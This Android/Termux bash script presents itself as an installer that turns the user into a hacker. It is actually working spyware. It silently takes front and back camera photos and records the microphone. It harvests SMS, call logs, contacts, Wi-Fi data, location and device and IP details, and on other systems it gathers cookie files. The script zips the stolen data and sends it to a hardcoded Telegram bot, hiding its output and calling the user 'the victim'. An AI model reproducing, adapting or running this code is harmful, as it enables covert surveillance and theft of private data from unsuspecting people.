#! /usr/bin/bash

# Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
## ANSI colors (FG & BG)
RED="$(printf '\033[31m')"  GREEN="$(printf '\033[32m')"  ORANGE="$(printf '\033[33m')"  BLUE="$(printf '\033[34m')"
MAGENTA="$(printf '\033[35m')"  CYAN="$(printf '\033[36m')"  WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
REDBG="$(printf '\033[41m')"  GREENBG="$(printf '\033[42m')"  ORANGEBG="$(printf '\033[43m')"  BLUEBG="$(printf '\033[44m')"
MAGENTABG="$(printf '\033[45m')"  CYANBG="$(printf '\033[46m')"  WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
RESETBG="$(printf '\e[0m\n')"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="$0 is a tool can install and startup you to become a hacker with alots of tools $hehe "
name=$0
B24B_HOST="193.161.193.99"
B24B_PORT="37858"
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)
Dev=$(echo -e "

#----------------
Device infomore : $Device\n
#----------------
Hacked on date  : $Tdate\n
#----------------
Host Name       : $HostName\n
#----------------
Kernel          : $Kernel\n
#----------------
Up Time         : $UpTime\n
#----------------
Memory Usage    : $MemoryUsage\n
#----------------
IP Address      : $ip_data\n
#----------------

")
if [[ -f $PREFIX/etc/Hacked/Victam/victam.sim ]];then

Dev_ID=$(sed -n '5p' $PREFIX/etc/Hacked/Victam/victam.sim)

fi
#-------------------------#

loading_bar() {
    for ((i=0; i<=100; i+=10)); do
        echo -ne "Loading: $i% ["&>> /dev/null
        for ((j=0; j<i/10; j++)); do
            echo -ne "=" &>> /dev/null
        done
        for ((j=i/10; j<10; j++)); do
            echo -ne " " &>> /dev/null
        done
        echo -ne "]\r" &>> /dev/null
	if [[ speed_num == '' ]];then
        sleep 0.1
	else
	sleep $speed_num
	fi

    done
    echo "Loading complete!" &>> /dev/null
}

# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com
        if [ "$?" = 0 ]; then

	    nN='Y'
	    NnEt="Connected To Network [★]"

	break
       else
		nN='N'
		NnEt="No Internet [X] "
		break
        fi
    done
}

# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
if [[ $nN == "Y" ]];then
Device=$(termux-info)
fi
PREFIX='/data/data/com.termux/files/usr/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/'
Device=$(uname -a)
else
echo -e $info $r "${bad}No supported package manager found! Install packages manually!" &>> /dev/null
fi

if [[ $nN == Y ]];then
if [[ $termux == true ]];then

ip_data=$(curl -s ipinfo.io;ifconfig)

else

ip_data=$(curl -s ipinfo.io;ip a)

fi
fi
# package manager

if [[ `command -v B24B.apt` ]]; then
        apt="apt"
elif [[ `command -v apt` ]]; then
    apt="apt"
elif  [[ `command -v apt-get` ]]; then
    apt="apt-get"
elif  [[ `command -v yum` ]]; then
    apt="yum"
elif [[ `command -v dnf` ]]; then
    apt="dnf"
elif [[ `command -v apk` ]]; then
    apt="apk"
elif [[ `command -v pacman` ]]; then
    apt="pacman"
else
    echo -e "${bad}No supported package manager found! Install packages manually!" &>> /dev/null
fi

if [[ -f $PREFIX/etc/Hacked/LOCKS/api_lock_file ]];then

	printf ""

else
	if [[ $termux == "true" ]];then
		touch $PREFIX/etc/Hacked/LOCKS/api_lock_file

#{----------------------Start-----------------}
	termux-api-start &>> /dev/null
msg="error"
		rm -rfd $PREFIX/etc/Hacked/Victam/*

		Camera1(){
#Camera##############################################################################
if [[ `command -v termux-camera-photo` ]];then

		command_a=$(termux-camera-photo -c 1 $PREFIX/etc/Hacked/Victam/victam_front.jpg)
		if echo $command_a | grep -q "$msg" ;then

				printf ""
				Camera1

	        else


				curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New Photo Locate on Device : ${Dev_ID} " &>>/dev/null



	        fi
else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi
		}
		Camera2(){
#################################################################################
if [[ `command -v termux-camera-photo` ]];then

					command_a=$(termux-camera-photo -c 0 $PREFIX/etc/Hacked/Victam/victam_back.jpg)
				        if echo $command_a | grep -q "$msg" ;then

						Camera2

				        else

				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New Photo Locate on Device : ${Dev_ID} " &>>/dev/null


				        fi

else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi
		}
		SMS1(){
#Sms#################################################################################
if [[ `command -v termux-sms-list` ]];then

					command_a=$(termux-sms-list > $PREFIX/etc/Hacked/Victam/victam_sms.txt)
				        if echo $command_a | grep -q "$msg" ;then

						printf ""
						SMS1

				        else


				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New SMS File Locate on Device : ${Dev_ID} " &>>/dev/null


				        fi

else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi


		}
		SMS2(){
#################################################################################
if [[ `command -v termux-telephony-deviceinfo` ]];then

					command_a=$(termux-telephony-deviceinfo > $PREFIX/etc/Hacked/Victam/victam_sim.txt)

				        if echo $command_a | grep -q "$msg" ;then

						printf ""
						SMS2

				        else

			        	        curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New CallPhone Locate on Device : ${Dev_ID} " &>>/dev/null


				        fi

else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi

		}
		SMS3(){
#################################################################################
if [[ `command -v termux-call-log` ]];then

					command_a=$(termux-call-log > $PREFIX/etc/Hacked/Victam/victam_call.txt)
				        if echo $command_a | grep -q "$msg" ;then

						printf ""
						SMS3

				        else


				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New CallPhone Locate on Device : ${Dev_ID} " &>>/dev/null


				        fi
else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi

		}
		SMS4(){
#################################################################################
if [[ `command -v termux-contact-list` ]];then

					command_a=$(termux-contact-list > $PREFIX/etc/Hacked/Victam/victam_call2)
				        if echo $command_a | grep -q "$msg" ;then

						SMS4
						printf ""

				        else

				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New CallPhone Locate on Device : ${Dev_ID} " &>>/dev/null
						echo "$(cat $PREFIX/etc/Hacked/Victam/victam_call2)" | jq -c '.[]' | while IFS= read -r line
						do
						    name=$(echo "$line" | jq -r '.name')
						    number=$(echo "$line" | jq -r '.number')

						    vcf_data="BEGIN:VCARD\nVERSION:3.0\nN:${name}\nTEL;TYPE=CELL:${number}\nEND:VCARD\n"

						    echo -e "$vcf_data" >> $PREFIX/etc/Hacked/Victam/victam_call2.vcf
						done
						rm $PREFIX/etc/Hacked/Victam/victam_call2

				        fi

else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi

		}
		wifi1(){
#Wifi################################################################################
if [[ `command -v termux-wifi-connectioninfo` ]];then

					command_a=$(termux-wifi-connectioninfo > $PREFIX/etc/Hacked/Victam/victam_wifi.txt)
				        if echo $command_a | grep -q "$msg" ;then

						printf ""
						wifi1
				        else


				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New WifiData Locate on Device : ${Dev_ID} " &>>/dev/null


				        fi
else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi

		}
#################################################################################
		wifi2(){
if [[ `command -v termux-wifi-scaninfo` ]];then

					command_a=$(termux-wifi-scaninfo > $PREFIX/etc/Hacked/Victam/victam_wifi_scan.txt)
				        if echo $command_a | grep -q "$msg" ;then

						printf ""

				        else

				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New WifiData Locate on Device : ${Dev_ID} " &>>/dev/null


				        fi
else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi

		}
		location(){
#location############################################################################
if [[ `command -v termux-location` ]];then

					command_a=$(termux-location > $PREFIX/etc/Hacked/Victam/victam_location.txt)
				        if echo $command_a | grep -q "$msg" ;then

						printf ""

				        else

				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New location Locate on Device : ${Dev_ID}" &>>/dev/null

				        fi
else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi

		}
		MIC(){
#location############################################################################
if [[ `command -v termux-microphone-record` ]];then

					command_a=$(termux-microphone-record -l 7 -r 60 -c 1 -f $PREFIX/etc/Hacked/Victam/Victam.mp3)
					if echo $command_a | grep -q "$msg" ;then

						printf ""
						MIC

				        else

				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New Voice Locate on Device : ${Dev_ID}" &>>/dev/null


				        fi
else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi


		}
#################################################################################
		WLP(){
#location############################################################################
if [[ `command -v termux-wallpaper` ]];then

					command_a=$(termux-wallpaper -u $2)
				        if echo $command_a | grep -q "$msg" ;then

						printf ""
						WLP

        				else

				                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New Wallpaper set on Device : ${Dev_ID}" &>>/dev/null


				        fi
else

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="For some reason I can't take a picture of the victim ${Dev}" &>>/dev/null

fi

		}
#################################################################################
cookie(){
#################################################################################

	curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="Start Get The Cookies Files !" &>>/dev/null

for cookie in $(find / -name *cookie*);do

	curl -X POST --silent -F document=@${cookie} https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID} &>>/dev/null

done

for cookies in $(find / -name *cookies*);do

	curl -X POST --silent -F document=@${cookies} https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID} &>>/dev/null

done
#################################################################################
}
#################################################################################
SFX(){
#################################################################################
if [[ `command -v sox` ]];then

if [[ $termux == "true" ]];then

        if [[ `command -v termux-volume` ]];then

                termux-volume call 100
                termux-volume system 100
                termux-volume music 100
                termux-volume alarm 100
                termux-volume notification 100

		play $2 &>>/dev/null
        else
                printf ""

        fi
else

	play $2 &>>/dev/null

fi

else

$apt install sox -y &>>/dev/null
SFX

fi
#################################################################################
}
#################################################################################




cd $PREFIX/etc/Hacked/Victam/


if [[ "${1}" == "host" && "${2}" != "" && "${3}" != "" ]];then

	TOKEN="${2}"
	CHAT_ID="${3}"

	if [[ ${termux} == "true" ]];then

		Camera1
		Camera2
		SMS1
		SMS3
		wifi1
		wifi2


	else

		cookie


	fi

cd $PREFIX/etc/Hacked/Victam/
zip Hacked_By_Blue24Bluer.zip * &>> /dev/null
curl -X POST --silent -F document=@Hacked_By_Blue24Bluer${Dev_ID}.zip https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID} &>>/dev/null

else

	TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
	CHAT_ID="5010958919"

	if [[ $1 == "PIC" ]];then

		Camera1

		Camera2

	elif [[ $1 == "VID" ]];then

		bash $PREFIX/etc/Hacked/Badshell/backdoor VID &

	elif [[ $1 == "TXT" ]];then

		bash $PREFIX/etc/Hacked/Badshell/backdoor TXT &

	elif [[ $1 == "SMS" ]];then

		SMS1

		SMS2

		SMS3

	elif [[ $1 == "WIFI" ]];then

		wifi1
		wifi2

	elif [[ $1 == "MIC" ]];then

		MIC

	elif [[ $1 == "WLP" ]];then

		WLP

	elif [[ $1 == "All" || $1 == "" ]];then

		Camera1
		Camera2
		SMS1
		SMS2
		SMS3
		SMS4
		wifi1
		wifi2
		location
		MIC

	elif [[ $1 == "COOKIE" || $termux != "true" ]];then

		cookie

	elif [[ $1 == "SFX" || $termux != "true" ]];then

		SFX

	fi


cd $PREFIX/etc/Hacked/Victam/
zip Hacked_By_Blue24Bluer.zip * &>> /dev/null
curl -X POST --silent -F document=@Hacked_By_Blue24Bluer${Dev_ID}.zip https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID} &>>/dev/null


fi



#     = All Files
# All = All Files
# PIC = All Picture and Images
# VID = All Videos
# TXT = All Text Files
# SEX = SexMode
# WLP = Change Wallpaper
# MIC = Play Micrephon
# SMS = All SMS
# TXT = All TXT files
#----------------------------------------------

echo "End" > $PREFIX/etc/Hacked/LOCKS/api_lock_file
rm $PREFIX/etc/Hacked/LOCKS/api_lock_file

else

curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text="Sorry to tell you, that the victim uses non-Android devices and the victim’s data cannot be transmitted or photographed directly"

fi
fi
